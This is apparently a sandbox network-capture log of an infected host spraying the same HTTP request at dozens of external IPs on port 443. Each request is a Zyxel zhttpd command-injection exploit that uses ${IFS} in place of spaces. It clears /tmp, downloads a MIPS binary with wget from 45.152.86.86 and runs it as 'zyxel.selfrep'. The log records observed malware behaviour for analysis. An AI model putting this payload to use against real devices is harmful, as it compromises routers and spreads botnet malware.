                                        Mar 31, 2024 09:22:39.819328070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8812192.168.2.2340572164.8.237.18443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.819363117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8813192.168.2.2351782151.102.213.142443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.819408894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8814192.168.2.2355108122.144.198.175443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.819437981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8815192.168.2.23388462.194.250.253443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.819489002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8816192.168.2.233808685.63.82.194443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.819520950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8817192.168.2.234994096.37.23.19443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.819581985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8818192.168.2.2354702148.169.126.249443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.819638968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8819192.168.2.2360060194.234.57.128443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.819674015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8820192.168.2.233676041.239.28.10443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.819725990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8821192.168.2.235410090.35.114.247443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.819780111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8822192.168.2.233844038.143.31.39443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.819825888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8823192.168.2.2350798182.215.78.185443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.819869995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8824192.168.2.2360384154.254.124.49443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.819926023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8825192.168.2.2358154124.145.27.55443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.819963932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8826192.168.2.2349296162.122.135.194443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.820012093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8827192.168.2.2344262176.10.169.166443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.820055008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8828192.168.2.234637076.224.203.243443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.820107937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8829192.168.2.235528687.23.247.208443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.820133924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8830192.168.2.234998894.104.48.112443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.820187092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8831192.168.2.233282865.182.208.13443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.820241928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8832192.168.2.2360706219.45.161.139443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.820278883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8833192.168.2.2357148188.189.177.204443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.820319891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8834192.168.2.234475272.232.226.48443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.820363045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8835192.168.2.2353752185.198.117.238443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.820421934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8836192.168.2.2358628190.5.176.5443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.820436954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8837192.168.2.2337290161.114.65.54443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.820496082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8838192.168.2.235260852.2.35.123443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.820547104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8839192.168.2.2353156174.103.107.204443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.820595980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8840192.168.2.2356104110.76.249.212443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.820622921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8841192.168.2.2358164150.214.231.164443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.820662022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8842192.168.2.235530074.52.106.75443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.820707083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8843192.168.2.2334078205.100.8.214443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.820741892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8844192.168.2.2341408184.62.146.171443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.820801020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8845192.168.2.2342088100.28.191.139443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.820832968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8846192.168.2.2341912223.87.194.59443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.820888042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8847192.168.2.235648465.58.50.237443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.820940971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8848192.168.2.2346352146.201.153.120443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.820981979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8849192.168.2.234008438.223.34.112443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.821031094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8850192.168.2.2341010209.215.58.247443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.821078062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8851192.168.2.234571466.56.163.109443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.821121931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8852192.168.2.235297879.233.77.199443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.821163893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8853192.168.2.233863257.220.237.239443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.821223021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8854192.168.2.235855236.37.239.69443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.821263075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8855192.168.2.2359908113.224.115.24443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.821290016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8856192.168.2.2358776120.84.38.113443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.821330070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8857192.168.2.235927440.23.26.152443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.821376085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8858192.168.2.2334694152.182.94.114443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.821434021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8859192.168.2.2349122184.171.73.77443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.821466923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8860192.168.2.23439264.34.66.62443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.821515083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8861192.168.2.2352990138.193.24.41443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.821551085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8862192.168.2.235349893.141.91.142443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.821621895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8863192.168.2.2332772194.193.190.103443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.821635962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8864192.168.2.2348752140.140.22.246443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.821683884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8865192.168.2.233804666.252.58.6443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.821717024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8866192.168.2.235647271.107.20.78443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.821767092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8867192.168.2.235665659.227.20.223443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.821816921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8868192.168.2.2335966110.194.120.167443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.821850061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8869192.168.2.234923069.36.60.7443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.821913004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8870192.168.2.233772063.248.213.159443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.821949959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8871192.168.2.2355084217.137.23.78443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.822006941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8872192.168.2.2356776162.209.106.212443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.822045088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8873192.168.2.2356702147.153.255.49443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.822077036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8874192.168.2.2336292108.94.81.218443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.822124004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8875192.168.2.2350286164.177.215.156443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.822181940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8876192.168.2.234769262.180.23.170443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.822220087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8877192.168.2.2359936166.12.16.150443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.822266102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8878192.168.2.235748042.15.62.82443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:39.822314978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8879192.168.2.2348008206.154.84.173443
                                        TimestampBytes transferredDirectionData
